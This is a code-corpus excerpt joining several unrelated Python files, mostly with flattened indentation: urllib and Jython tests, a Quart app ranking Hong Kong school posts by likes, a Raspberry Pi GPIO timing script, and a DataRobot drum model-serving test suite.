self.assertEqual(('user', 'a\tb'),urllib.parse.splitpasswd('user:a\tb'))
self.assertEqual(('user', 'a\rb'),urllib.parse.splitpasswd('user:a\rb'))
self.assertEqual(('user', 'a\fb'),urllib.parse.splitpasswd('user:a\fb'))
self.assertEqual(('user', 'a\vb'),urllib.parse.splitpasswd('user:a\vb'))
self.assertEqual(('user', 'a:b'),urllib.parse.splitpasswd('user:a:b'))
class URLopener_Tests(unittest.TestCase):
"""Testcase to test the open method of URLopener class."""
def test_quoted_open(self):
class DummyURLopener(urllib.request.URLopener):
def open_spam(self, url):
return url
self.assertEqual(DummyURLopener().open(
'spam://example/ /'),'//example/%20/')
# test the safe characters are not quoted by urlopen
self.assertEqual(DummyURLopener().open(
"spam://c:|windows%/:=&?~#+!$,;'@()*[]|/path/"),
"//c:|windows%/:=&?~#+!$,;'@()*[]|/path/")
# The FTP tests below are just commented out.
# I can't really tell why they keep failing on Windows and SPARC buildbots.
# Everywhere else they work ok, but on those machines they sometimes fail
# in one of the tests, sometimes in another. I have a Linux box, and the
# tests pass there.
# If anybody has one of the problematic environments, please help!
# . Facundo
#
# def server(evt):
# import socket, time
# serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# serv.settimeout(3)
# serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# serv.bind(("", 9093))
# serv.listen(5)
# try:
# conn, addr = serv.accept()
# conn.send("1 Hola mundo\n")
# cantdata = 0
# while cantdata < 13:
# data = conn.recv(13-cantdata)
# cantdata += len(data)
# time.sleep(.3)
# conn.send("2 No more lines\n")
# conn.close()
# except socket.timeout:
# pass
# finally:
# serv.close()
# evt.set()
#
# class FTPWrapperTests(unittest.TestCase):
#
# def setUp(self):
# import ftplib, time, threading
# ftplib.FTP.port = 9093
# self.evt = threading.Event()
# threading.Thread(target=server, args=(self.evt,)).start()
# time.sleep(.1)
#
# def tearDown(self):
# self.evt.wait()
#
# def testBasic(self):
# # connects
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# ftp.close()
#
# def testTimeoutNone(self):
# # global default timeout is ignored
# import socket
# self.assertTrue(socket.getdefaulttimeout() is None)
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutDefault(self):
# # global default timeout is used
# import socket
# self.assertTrue(socket.getdefaulttimeout() is None)
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutValue(self):
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [],
# timeout=30)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
def test_main():
support.run_unittest(
urlopen_FileTests,
urlopen_HttpTests,
urlretrieve_FileTests,
ProxyTests,
QuotingTests,
UnquotingTests,
urlencode_Tests,
Pathname_Tests,
Utility_Tests,
URLopener_Tests,
#FTPWrapperTests,
)
if __name__ == '__main__':
test_main()
|
main.py
|
import asyncio
import json
import logging
import threading
from datetime import datetime
from typing import List, Tuple, Dict, Any
from aiocache import cached
from pytz import utc, timezone
from quart import Quart, render_template
from update_likes import likes_data, update_likes
logging.basicConfig(level="INFO", format="%(asctime)s - %(name)s - %(levelname)s - %(message)s")
logger = logging.getLogger(__name__)
try:
import coloredlogs
coloredlogs.install(level="INFO", fmt="%(asctime)s - %(name)s - %(levelname)s - %(message)s")
except ImportError:
    logger.warning("coloredlogs unavailable")
app = Quart(__name__)
UNIVERSITIES = [
"香港大學",
"香港理工大學",
"香港浸會大學",
"香港中文大學",
"嶺南大學",
"香港城市大學",
"香港科技大學",
"香港教育大學",
"香港公開大學",
"香港樹仁大學",
"香港恒生大學"
]
hkt = timezone("Asia/Hong_Kong")
def get_likes() -> Tuple[List[Dict[str, Any]], List[Dict[str, Any]]]:
sslb = []
ulb = []
with open("posts.json", encoding="utf-8") as f:
posts = json.load(f)
for post in posts:
if post["school"] not in likes_data:
continue
lb = ulb if post["school"] in UNIVERSITIES else sslb
lb.append({**post, **likes_data[post["school"]]})
# Now each post object has keys "shortcode", "school", "likes" and "updated".
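    # Hypothetical example of one merged entry (values are illustrative only;
    # "shortcode", "likes" and "updated" come from posts.json / likes_data):
    #   {"shortcode": "ABC123", "school": "香港大學",
    #    "likes": 1234, "updated": "2021-05-01T12:00:00+00:00"}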
sslb.sort(key=lambda d: d["likes"], reverse=True)
ulb.sort(key=lambda d: d["likes"], reverse=True)
return sslb, ulb
@app.route("/")
@cached(ttl=1)
async def index() -> str:
sslb, ulb = get_likes()
return await render_template("index.html", sslb=sslb, ulb=ulb, enumerate=enumerate)
@app.template_filter("hkt")
async def show_hkt(iso_dt: str) -> str:
return datetime.fromisoformat(iso_dt).astimezone(hkt).strftime("%Y-%m-%d %H:%M:%S HKT")
async def update_likes_periodically() -> None:
    """Refresh the likes data in a worker thread every 3 hours."""
while True:
thread = threading.Thread(target=update_likes, daemon=True)
thread.start()
await asyncio.sleep(3 * 60 * 60)
thread.join()
@app.before_serving
async def before_serving():
    asyncio.create_task(update_likes_periodically())
|
test_sys_jy.py
|
import sys
import re
import unittest
import test.test_support
class SysTest(unittest.TestCase):
def test_platform(self):
self.assertEquals(sys.platform[:4], "java",
"sys.platform is not java")
def test_exit_arg(self):
"sys.exit can be called with args"
try:
sys.exit("leaving now")
except SystemExit, e:
self.assertEquals(str(e), "leaving now")
def test_tuple_args(self):
"Exceptions raised unpacking tuple args have right line number"
def tuple_args( (x,y) ): pass
try:
tuple_args( 10 )
except TypeError:
tb = sys.exc_info()[2]
if tb.tb_lineno == 0:
self.fail("Traceback lineno was zero")
def test_name(self):
"sys.__name__ can be reassigned/deleted"
self.assertEquals(sys.__name__, 'sys')
sys.__name__ = 'foo'
self.assert_('foo' in str(sys))
del sys.__name__
self.assert_('foo' not in str(sys))
sys.__name__ = 'sys'
def test_readonly(self):
def deleteClass(): del sys.__class__
self.assertRaises(TypeError, deleteClass)
def deleteDict(): del sys.__dict__
self.assertRaises(TypeError, deleteDict)
def assignClass(): sys.__class__ = object
self.assertRaises(TypeError, assignClass)
def assignDict(): sys.__dict__ = {}
self.assertRaises(TypeError, assignDict)
def test_resetmethod(self):
gde = sys.getdefaultencoding
sys.getdefaultencoding = 5
self.assertEquals(sys.getdefaultencoding, 5)
del sys.getdefaultencoding
self.assertRaises(AttributeError, getattr, sys, 'getdefaultencoding')
sys.getdefaultencoding = gde
def test_reload(self):
gde = sys.getdefaultencoding
del sys.getdefaultencoding
reload(sys)
self.assert_(type(sys.getdefaultencoding) == type(gde))
def exec_code_separately(function, sharing=False):
"""Runs code in a separate context: (thread, PySystemState, PythonInterpreter)
A PySystemState is used in conjunction with its thread
context. This is not so desirable - at the very least it means
that a thread pool cannot be shared. But this is not the place to
revisit ancient design decisions."""
def function_context():
from org.python.core import Py
from org.python.util import PythonInterpreter
from org.python.core import PySystemState
ps = PySystemState()
pi = PythonInterpreter({}, ps)
if not sharing:
ps.shadow()
ps.builtins = ps.builtins.copy()
pi.exec(function.func_code)
import threading
context = threading.Thread(target=function_context)
context.start()
context.join()
def set_globally():
import sys
import test.sys_jy_test_module # used as a probe
# can't use 'foo', test_with wants to have that undefined
sys.builtins['test_sys_jy_foo'] = 42
def set_shadow():
import sys
sys.builtins['fum'] = 24
class ShadowingTest(unittest.TestCase):
def setUp(self):
exec_code_separately(set_globally, sharing=True)
exec_code_separately(set_shadow)
def test_super_globals(self):
import sys, __builtin__
def get_sym(sym):
return sys.builtins.get(sym)
def get_sym_attr(sym):
return hasattr(__builtin__, sym)
self.assertEqual(test_sys_jy_foo, 42, "should be able to install a new builtin ('super global')")
self.assertEqual(get_sym('test_sys_jy_foo'), 42)
self.assertTrue(get_sym_attr('test_sys_jy_foo'))
def is_fum_there(): fum
self.assertRaises(NameError, is_fum_there) # shadowed global ('fum') should not be visible
self.assertEqual(get_sym('fum'), None)
self.assertTrue(not(get_sym_attr('fum')))
def test_sys_modules_per_instance(self):
import sys
self.assertTrue('sys_jy_test_module' not in sys.modules, "sys.modules should be per PySystemState instance")
def test_main():
test.test_support.run_unittest(SysTest, ShadowingTest)
if __name__ == "__main__":
test_main()
|
test4.py
|
import RPi.GPIO as GPIO
import time
import Queue
import threading
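# This script polls the speed pin (BCM 18) every 0.5 ms and measures the time
# between consecutive rising edges using a small START -> WAIT_POS_EDGE ->
# WAIT_NEG_EDGE state machine; each measured interval is pushed onto a queue
# and printed from a background thread.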
GPIO.setmode(GPIO.BCM)
speedpin=18
GPIO.setup(speedpin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
queue = Queue.Queue()
def printQueue():
while True:
s = queue.get()
print(s)
ta = threading.Thread(target=printQueue)
ta.start()
START = 0
WAIT_POS_EDGE = 1
WAIT_NEG_EDGE = 2
state = START
t0 = time.time()
while True:
time.sleep(0.0005)
i = GPIO.input(speedpin)
if state == START:
if i == 0:
state = WAIT_POS_EDGE
elif state == WAIT_POS_EDGE:
if i == 1:
t1 = time.time()
queue.put( "{t:f}".format(t=(t1-t0)))
t0 = t1
state = WAIT_NEG_EDGE
elif state == WAIT_NEG_EDGE:
if i == 0:
state = WAIT_POS_EDGE
|
test_custom_model.py
|
import collections
import glob
import json
import os
import pickle
import re
import shutil
import signal
import subprocess
import time
from tempfile import NamedTemporaryFile
from threading import Thread
from unittest import mock
from uuid import uuid4
import numpy as np
import pandas as pd
import pytest
import requests
from datarobot_drum.drum.args_parser import CMRunnerArgsRegistry
from datarobot_drum.drum.common import (
ArgumentsOptions,
CUSTOM_FILE_NAME,
CustomHooks,
PythonArtifacts,
RunMode,
)
from datarobot_drum.drum.runtime import DrumRuntime
TRAINING = "training"
INFERENCE = "inference"
# Framework keywords
XGB = "xgboost"
KERAS = "keras"
KERAS_JOBLIB = "keras_joblib"
SKLEARN = "sklearn"
SIMPLE = "simple"
PYTORCH = "pytorch"
PYPMML = "pypmml"
RDS = "rds"
CODEGEN = "jar"
## adding h2o pojo and mojo
MOJO = "zip"
POJO = "java"
##
MULTI_ARTIFACT = "multiartifact"
CODEGEN_AND_SKLEARN = "codegen_and_sklearn"
# Problem keywords, used to mark datasets
REGRESSION = "regression"
REGRESSION_INFERENCE = "regression_inference"
BINARY = "binary"
# Language keywords
PYTHON = "python3"
NO_CUSTOM = "no_custom"
PYTHON_ALL_HOOKS = "python_all_hooks"
PYTHON_LOAD_MODEL = "python_load_model"
R = "R"
R_ALL_HOOKS = "R_all_hooks"
R_FIT = "R_fit"
JAVA = "java"
PYTHON_XGBOOST_CLASS_LABELS_VALIDATION = "predictions_and_class_labels_validation"
DOCKER_PYTHON_SKLEARN = "cmrunner_test_env_python_sklearn"
RESPONSE_PREDICTIONS_KEY = "predictions"
WEIGHTS_ARGS = "weights-args"
WEIGHTS_CSV = "weights-csv"
class DrumServerProcess:
def __init__(self):
self.process = None
self.out_stream = None
self.err_stream = None
@property
def returncode(self):
return self.process.returncode
class DrumServerRun:
def __init__(
self,
framework,
problem,
custom_model_dir,
docker=None,
with_error_server=False,
show_stacktrace=True,
):
port = 6799
server_address = "localhost:{}".format(port)
url_host = os.environ.get("TEST_URL_HOST", "localhost")
if docker:
self.url_server_address = "http://{}:{}".format(url_host, port)
else:
self.url_server_address = "http://localhost:{}".format(port)
cmd = "{} server --code-dir {} --address {}".format(
ArgumentsOptions.MAIN_COMMAND, custom_model_dir, server_address
)
cmd = TestCMRunner._cmd_add_class_labels(cmd, framework, problem)
if docker:
cmd += " --docker {}".format(docker)
if with_error_server:
cmd += " --with-error-server"
if show_stacktrace:
cmd += " --show-stacktrace"
self._cmd = cmd
self._process_object_holder = DrumServerProcess()
self._server_thread = None
def __enter__(self):
self._server_thread = Thread(
target=TestCMRunner.run_server_thread, args=(self._cmd, self._process_object_holder)
)
self._server_thread.start()
time.sleep(0.5)
TestCMRunner.wait_for_server(
self.url_server_address, timeout=10, process_holder=self._process_object_holder
)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
# shutdown server
response = requests.post(self.url_server_address + "/shutdown/")
assert response.ok
time.sleep(1)
self._server_thread.join()
@property
def process(self):
return self._process_object_holder or None
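    # Usage sketch (mirrors how the tests below use this helper):
    #
    #     with DrumServerRun(framework, problem, custom_model_dir, docker) as run:
    #         response = requests.post(run.url_server_address + "/predict/",
    #                                  files={"X": open(input_dataset)})
    #
    # Entering the context starts the drum server in a background thread and
    # waits for it to answer; leaving it posts to /shutdown/ and joins the thread.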
class TestCMRunner:
@classmethod
def setup_class(cls):
cls.tests_root_path = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
cls.tests_fixtures_path = os.path.join(cls.tests_root_path, "fixtures")
cls.tests_artifacts_path = os.path.join(cls.tests_fixtures_path, "drop_in_model_artifacts")
cls.tests_data_path = os.path.join(cls.tests_root_path, "testdata")
cls.training_templates_path = os.path.join(
cls.tests_root_path, "..", "model_templates", "training"
)
cls.paths_to_training_models = {
(PYTHON, SKLEARN): os.path.join(cls.training_templates_path, "python3_sklearn"),
(PYTHON, SIMPLE): os.path.join(cls.training_templates_path, "simple"),
(PYTHON, KERAS): os.path.join(cls.training_templates_path, "python3_keras_joblib"),
(PYTHON, XGB): os.path.join(cls.training_templates_path, "python3_xgboost"),
(R_FIT, RDS): os.path.join(cls.training_templates_path, "r_lang"),
(PYTHON, PYTORCH): os.path.join(cls.training_templates_path, "python3_pytorch"),
}
cls.fixtures = {
PYTHON: (os.path.join(cls.tests_fixtures_path, "custom.py"), "custom.py"),
NO_CUSTOM: (None, None),
PYTHON_ALL_HOOKS: (
os.path.join(cls.tests_fixtures_path, "all_hooks_custom.py"),
"custom.py",
),
PYTHON_XGBOOST_CLASS_LABELS_VALIDATION: (
os.path.join(cls.tests_fixtures_path, "pred_validation_custom.py"),
"custom.py",
),
PYTHON_LOAD_MODEL: (
os.path.join(cls.tests_fixtures_path, "load_model_custom.py"),
"custom.py",
),
R: (os.path.join(cls.tests_fixtures_path, "custom.R"), "custom.R"),
R_ALL_HOOKS: (os.path.join(cls.tests_fixtures_path, "all_hooks_custom.R"), "custom.R"),
R_FIT: (os.path.join(cls.tests_fixtures_path, "fit_custom.R"), "custom.R"),
}
cls.datasets = {
# If specific dataset should be defined for a framework, use (framework, problem) key.
# Otherwise default dataset is used (None, problem)
(None, REGRESSION): os.path.join(cls.tests_data_path, "boston_housing.csv"),
(PYPMML, REGRESSION): os.path.join(cls.tests_data_path, "iris_binary_training.csv"),
(None, REGRESSION_INFERENCE): os.path.join(
cls.tests_data_path, "boston_housing_inference.csv"
),
(None, BINARY): os.path.join(cls.tests_data_path, "iris_binary_training.csv"),
}
cls.artifacts = {
(None, REGRESSION): None,
(None, BINARY): None,
(SKLEARN, REGRESSION): os.path.join(cls.tests_artifacts_path, "sklearn_reg.pkl"),
(SKLEARN, REGRESSION_INFERENCE): os.path.join(
cls.tests_artifacts_path, "sklearn_reg.pkl"
),
(MULTI_ARTIFACT, REGRESSION): [
os.path.join(cls.tests_artifacts_path, "sklearn_reg.pkl"),
os.path.join(cls.tests_artifacts_path, "keras_reg.h5"),
],
(CODEGEN_AND_SKLEARN, REGRESSION): [
os.path.join(cls.tests_artifacts_path, "java_reg.jar"),
os.path.join(cls.tests_artifacts_path, "sklearn_reg.pkl"),
],
(SKLEARN, BINARY): os.path.join(cls.tests_artifacts_path, "sklearn_bin.pkl"),
(KERAS, REGRESSION): os.path.join(cls.tests_artifacts_path, "keras_reg.h5"),
(KERAS, BINARY): os.path.join(cls.tests_artifacts_path, "keras_bin.h5"),
(XGB, REGRESSION): os.path.join(cls.tests_artifacts_path, "xgb_reg.pkl"),
(XGB, BINARY): os.path.join(cls.tests_artifacts_path, "xgb_bin.pkl"),
(PYTORCH, REGRESSION): [
os.path.join(cls.tests_artifacts_path, "torch_reg.pth"),
os.path.join(cls.tests_artifacts_path, "PyTorch.py"),
],
(PYTORCH, BINARY): [
os.path.join(cls.tests_artifacts_path, "torch_bin.pth"),
os.path.join(cls.tests_artifacts_path, "PyTorch.py"),
],
(RDS, REGRESSION): os.path.join(cls.tests_artifacts_path, "r_reg.rds"),
(RDS, BINARY): os.path.join(cls.tests_artifacts_path, "r_bin.rds"),
(CODEGEN, REGRESSION): os.path.join(cls.tests_artifacts_path, "java_reg.jar"),
(CODEGEN, BINARY): os.path.join(cls.tests_artifacts_path, "java_bin.jar"),
(POJO, REGRESSION): os.path.join(
cls.tests_artifacts_path,
"pojo_reg",
"drf_887c2e5b_0941_40b7_ae26_cae274c4b424.java",
),
(POJO, BINARY): os.path.join(
cls.tests_artifacts_path,
"pojo_bin",
"XGBoost_grid__1_AutoML_20200717_163214_model_159.java",
),
(MOJO, REGRESSION): os.path.join(cls.tests_artifacts_path, "mojo_reg.zip"),
(MOJO, BINARY): os.path.join(cls.tests_artifacts_path, "mojo_bin.zip"),
(PYPMML, REGRESSION): os.path.join(cls.tests_artifacts_path, "iris_reg.pmml"),
(PYPMML, BINARY): os.path.join(cls.tests_artifacts_path, "iris_bin.pmml"),
}
cls.target = {BINARY: "Species", REGRESSION: "MEDV"}
cls.class_labels = {
(SKLEARN, BINARY): ["Iris-setosa", "Iris-versicolor"],
(XGB, BINARY): ["Iris-setosa", "Iris-versicolor"],
(KERAS, BINARY): ["Iris-setosa", "Iris-versicolor"],
(RDS, BINARY): ["Iris-setosa", "Iris-versicolor"],
(PYPMML, BINARY): ["Iris-setosa", "Iris-versicolor"],
}
@classmethod
def teardown_class(cls):
pass
@staticmethod
def _exec_shell_cmd(cmd, err_msg, assert_if_fail=True, process_obj_holder=None, env=os.environ):
p = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True,
env=env,
universal_newlines=True,
)
if process_obj_holder is not None:
process_obj_holder.process = p
(stdout, stderr) = p.communicate()
if process_obj_holder is not None:
process_obj_holder.out_stream = stdout
process_obj_holder.err_stream = stderr
if p.returncode != 0:
print("stdout: {}".format(stdout))
print("stderr: {}".format(stderr))
if assert_if_fail:
assert p.returncode == 0, err_msg
return p, stdout, stderr
@classmethod
def _create_custom_model_dir(
cls, custom_model_dir, framework, problem, language, is_training=False, nested=False
):
if nested:
custom_model_dir = custom_model_dir.joinpath("nested_dir")
custom_model_dir.mkdir(parents=True, exist_ok=True)
if is_training:
model_template_dir = cls.paths_to_training_models[(language, framework)]
if language == PYTHON:
files = glob.glob(r"{}/*.py".format(model_template_dir))
elif language in [R, R_ALL_HOOKS, R_FIT]:
files = glob.glob(r"{}/*.r".format(model_template_dir)) + glob.glob(
r"{}/*.R".format(model_template_dir)
)
for filename in files:
shutil.copy2(filename, custom_model_dir)
else:
artifact_filenames = cls._get_artifact_filename(framework, problem)
if artifact_filenames is not None:
if not isinstance(artifact_filenames, list):
artifact_filenames = [artifact_filenames]
for filename in artifact_filenames:
shutil.copy2(filename, custom_model_dir)
fixture_filename, rename = cls._get_fixture_filename(language)
if fixture_filename:
shutil.copy2(fixture_filename, os.path.join(custom_model_dir, rename))
return custom_model_dir
@classmethod
def _get_artifact_filename(cls, framework, problem):
return cls.artifacts[(framework, problem)]
@classmethod
def _get_class_labels(cls, framework, problem):
return cls.class_labels.get((framework, problem), None)
@classmethod
def _get_dataset_filename(cls, framework, problem):
framework_key = framework
problem_key = problem
# if specific dataset for framework was not defined,
# use default dataset for this problem, e.g. (None, problem)
framework_key = None if (framework_key, problem_key) not in cls.datasets else framework_key
return cls.datasets[(framework_key, problem_key)]
@classmethod
def _get_fixture_filename(cls, language):
return cls.fixtures[language]
@classmethod
def _cmd_add_class_labels(cls, cmd, framework, problem):
if problem != BINARY:
return cmd
labels = cls._get_class_labels(framework, problem)
pos = labels[1] if labels else "yes"
neg = labels[0] if labels else "no"
cmd = cmd + " --positive-class-label {} --negative-class-label {}".format(pos, neg)
return cmd
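    # For a hypothetical binary sklearn run, the appended fragment would look like:
    #   " --positive-class-label Iris-versicolor --negative-class-label Iris-setosa"
    # (labels[1] is treated as the positive class, labels[0] as the negative one).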
@pytest.mark.parametrize(
"framework, problem, language, docker",
[
(SKLEARN, REGRESSION_INFERENCE, NO_CUSTOM, None),
(SKLEARN, REGRESSION, PYTHON, DOCKER_PYTHON_SKLEARN),
(SKLEARN, BINARY, PYTHON, None),
(KERAS, REGRESSION, PYTHON, None),
(KERAS, BINARY, PYTHON, None),
(XGB, REGRESSION, PYTHON, None),
(XGB, BINARY, PYTHON, None),
(XGB, BINARY, PYTHON_XGBOOST_CLASS_LABELS_VALIDATION, None),
(PYTORCH, REGRESSION, PYTHON, None),
(PYTORCH, BINARY, PYTHON, None),
(RDS, REGRESSION, R, None),
(RDS, BINARY, R, None),
(CODEGEN, REGRESSION, NO_CUSTOM, None),
(CODEGEN, BINARY, NO_CUSTOM, None),
(POJO, REGRESSION, NO_CUSTOM, None),
(POJO, BINARY, NO_CUSTOM, None),
(MOJO, REGRESSION, NO_CUSTOM, None),
(MOJO, BINARY, NO_CUSTOM, None),
(MULTI_ARTIFACT, REGRESSION, PYTHON_LOAD_MODEL, None),
(PYPMML, REGRESSION, NO_CUSTOM, None),
(PYPMML, BINARY, NO_CUSTOM, None),
],
)
def test_custom_models_with_drum(self, framework, problem, language, docker, tmp_path):
custom_model_dir = tmp_path / "custom_model"
self._create_custom_model_dir(custom_model_dir, framework, problem, language)
input_dataset = self._get_dataset_filename(framework, problem)
output = tmp_path / "output"
cmd = "{} score --code-dir {} --input {} --output {}".format(
ArgumentsOptions.MAIN_COMMAND, custom_model_dir, input_dataset, output
)
cmd = self._cmd_add_class_labels(cmd, framework, problem)
if docker:
cmd += " --docker {} --verbose ".format(docker)
TestCMRunner._exec_shell_cmd(
cmd, "Failed in {} command line! {}".format(ArgumentsOptions.MAIN_COMMAND, cmd)
)
in_data = pd.read_csv(input_dataset)
out_data = pd.read_csv(output)
assert in_data.shape[0] == out_data.shape[0]
@pytest.mark.parametrize(
"framework, problem, language", [(SKLEARN, BINARY, PYTHON), (RDS, BINARY, R)]
)
def test_bin_models_with_wrong_labels(self, framework, problem, language, tmp_path):
custom_model_dir = tmp_path / "custom_model"
self._create_custom_model_dir(custom_model_dir, framework, problem, language)
input_dataset = self._get_dataset_filename(framework, problem)
cmd = "{} score --code-dir {} --input {}".format(
ArgumentsOptions.MAIN_COMMAND, custom_model_dir, input_dataset
)
if problem == BINARY:
cmd = cmd + " --positive-class-label yes --negative-class-label no"
p, stdo, stde = TestCMRunner._exec_shell_cmd(
cmd,
"Failed in {} command line! {}".format(ArgumentsOptions.MAIN_COMMAND, cmd),
assert_if_fail=False,
)
stdo_stde = str(stdo) + str(stde)
if framework == SKLEARN:
assert (
str(stdo_stde).find(
"Wrong class labels. Use class labels detected by sklearn model"
)
!= -1
)
elif framework == RDS:
assert (
str(stdo_stde).find(
"Wrong class labels. Use class labels according to your dataset"
)
!= -1
)
    # testing language detection failures: missing or mismatched artifacts and custom code
@pytest.mark.parametrize(
"framework, problem, language",
[
(None, REGRESSION, NO_CUSTOM), # no artifact, no custom
(SKLEARN, REGRESSION, R), # python artifact, custom.R
(RDS, REGRESSION, PYTHON), # R artifact, custom.py
(None, REGRESSION, R), # no artifact, custom.R without load_model
(None, REGRESSION, PYTHON), # no artifact, custom.py without load_model
],
)
def test_detect_language(self, framework, problem, language, tmp_path):
custom_model_dir = tmp_path / "custom_model"
self._create_custom_model_dir(custom_model_dir, framework, problem, language)
input_dataset = self._get_dataset_filename(framework, problem)
cmd = "{} score --code-dir {} --input {}".format(
ArgumentsOptions.MAIN_COMMAND, custom_model_dir, input_dataset
)
if problem == BINARY:
cmd = cmd + " --positive-class-label yes --negative-class-label no"
p, stdo, stde = TestCMRunner._exec_shell_cmd(
cmd,
"Failed in {} command line! {}".format(ArgumentsOptions.MAIN_COMMAND, cmd),
assert_if_fail=False,
)
stdo_stde = str(stdo) + str(stde)
cases_1_2_3 = (
str(stdo_stde).find("Can not detect language by artifacts and/or custom.py/R files")
!= -1
)
case_4 = (
str(stdo_stde).find(
"Could not find a serialized model artifact with .rds extension, supported by default R predictor. "
"If your artifact is not supported by default predictor, implement custom.load_model hook."
)
!= -1
)
case_5 = (
str(stdo_stde).find(
"Could not find model artifact file in: {} supported by default predictors".format(
custom_model_dir
)
)
!= -1
)
assert any([cases_1_2_3, case_4, case_5])
    # testing the --language option: matching, mismatching, and missing language settings
@pytest.mark.parametrize(
"framework, problem, language, set_language",
[
(SKLEARN, REGRESSION_INFERENCE, R, "python"), # python artifact, custom.R
(RDS, REGRESSION, PYTHON, "r"), # R artifact, custom.py
(CODEGEN, REGRESSION, PYTHON, "java"), # java artifact, custom.py
(
CODEGEN_AND_SKLEARN,
REGRESSION,
NO_CUSTOM,
"java",
), # java and sklearn artifacts, no custom.py
(
CODEGEN_AND_SKLEARN,
REGRESSION,
NO_CUSTOM,
"python",
), # java and sklearn artifacts, no custom.py
# Negative cases
(SKLEARN, REGRESSION_INFERENCE, R, None), # python artifact, custom.R
(RDS, REGRESSION, PYTHON, None), # R artifact, custom.py
(CODEGEN, REGRESSION, PYTHON, None), # java artifact, custom.py
(
CODEGEN_AND_SKLEARN,
REGRESSION,
NO_CUSTOM,
None,
), # java and sklearn artifacts, no custom.py
(
CODEGEN_AND_SKLEARN,
REGRESSION,
NO_CUSTOM,
"r",
), # java and sklearn artifacts, no custom.py
],
)
def test_set_language(self, framework, problem, language, set_language, tmp_path):
custom_model_dir = tmp_path / "custom_model"
self._create_custom_model_dir(custom_model_dir, framework, problem, language)
input_dataset = self._get_dataset_filename(framework, problem)
cmd = "{} score --code-dir {} --input {}".format(
ArgumentsOptions.MAIN_COMMAND, custom_model_dir, input_dataset
)
if set_language:
cmd += " --language {}".format(set_language)
if problem == BINARY:
cmd += " --positive-class-label yes --negative-class-label no"
p, stdo, stde = TestCMRunner._exec_shell_cmd(
cmd,
"Failed in {} command line! {}".format(ArgumentsOptions.MAIN_COMMAND, cmd),
assert_if_fail=False,
)
if not set_language:
stdo_stde = str(stdo) + str(stde)
cases_4_5_6_7 = (
str(stdo_stde).find("Can not detect language by artifacts and/or custom.py/R files")
!= -1
)
assert cases_4_5_6_7
if framework == CODEGEN_AND_SKLEARN and set_language == "r":
stdo_stde = str(stdo) + str(stde)
case = (
str(stdo_stde).find(
"Could not find a serialized model artifact with .rds extension, supported by default R predictor. "
"If your artifact is not supported by default predictor, implement custom.load_model hook."
)
!= -1
)
assert case
@pytest.mark.parametrize(
"framework, language", [(SKLEARN, PYTHON_ALL_HOOKS), (RDS, R_ALL_HOOKS)]
)
def test_custom_model_with_all_predict_hooks(self, framework, language, tmp_path):
custom_model_dir = tmp_path / "custom_model"
self._create_custom_model_dir(custom_model_dir, framework, REGRESSION, language)
input_dataset = self._get_dataset_filename(framework, REGRESSION)
output = tmp_path / "output"
cmd = "{} score --code-dir {} --input {} --output {}".format(
ArgumentsOptions.MAIN_COMMAND, custom_model_dir, input_dataset, output
)
TestCMRunner._exec_shell_cmd(
cmd, "Failed in {} command line! {}".format(ArgumentsOptions.MAIN_COMMAND, cmd)
)
preds = pd.read_csv(output)
assert all(
val for val in (preds["Predictions"] == len(CustomHooks.ALL_PREDICT)).values
), preds
@staticmethod
def run_server_thread(cmd, process_obj_holder):
TestCMRunner._exec_shell_cmd(
cmd,
"Failed in {} command line! {}".format(ArgumentsOptions.MAIN_COMMAND, cmd),
assert_if_fail=False,
process_obj_holder=process_obj_holder,
)
@staticmethod
def wait_for_server(url, timeout, process_holder):
# waiting for ping to succeed
while True:
try:
response = requests.get(url)
if response.ok:
break
except Exception:
pass
time.sleep(1)
timeout -= 1
if timeout <= 0:
if process_holder is not None:
print("Killing subprocess: {}".format(process_holder.process.pid))
os.killpg(os.getpgid(process_holder.process.pid), signal.SIGTERM)
time.sleep(0.25)
os.killpg(os.getpgid(process_holder.process.pid), signal.SIGKILL)
assert timeout, "Server failed to start: url: {}".format(url)
@pytest.mark.parametrize(
"framework, problem, language, docker",
[
(SKLEARN, REGRESSION, PYTHON, DOCKER_PYTHON_SKLEARN),
(SKLEARN, BINARY, PYTHON, None),
(KERAS, REGRESSION, PYTHON, None),
(KERAS, BINARY, PYTHON, None),
(XGB, REGRESSION, PYTHON, None),
(XGB, BINARY, PYTHON, None),
(PYTORCH, REGRESSION, PYTHON, None),
(PYTORCH, BINARY, PYTHON, None),
(RDS, REGRESSION, R, None),
(RDS, BINARY, R, None),
(CODEGEN, REGRESSION, NO_CUSTOM, None),
(CODEGEN, BINARY, NO_CUSTOM, None),
(MOJO, REGRESSION, NO_CUSTOM, None),
(MOJO, BINARY, NO_CUSTOM, None),
(POJO, REGRESSION, NO_CUSTOM, None),
(POJO, BINARY, NO_CUSTOM, None),
(MULTI_ARTIFACT, REGRESSION, PYTHON_LOAD_MODEL, None),
(PYPMML, REGRESSION, NO_CUSTOM, None),
(PYPMML, BINARY, NO_CUSTOM, None),
],
)
def test_custom_models_with_drum_prediction_server(
self, framework, problem, language, docker, tmp_path
):
custom_model_dir = tmp_path / "custom_model"
TestCMRunner._create_custom_model_dir(custom_model_dir, framework, problem, language)
with DrumServerRun(framework, problem, custom_model_dir, docker) as run:
input_dataset = self._get_dataset_filename(framework, problem)
# do predictions
response = requests.post(
run.url_server_address + "/predict/", files={"X": open(input_dataset)}
)
print(response.text)
assert response.ok
actual_num_predictions = len(json.loads(response.text)[RESPONSE_PREDICTIONS_KEY])
in_data = pd.read_csv(input_dataset)
assert in_data.shape[0] == actual_num_predictions
@pytest.mark.parametrize(
"framework, problem, language, docker",
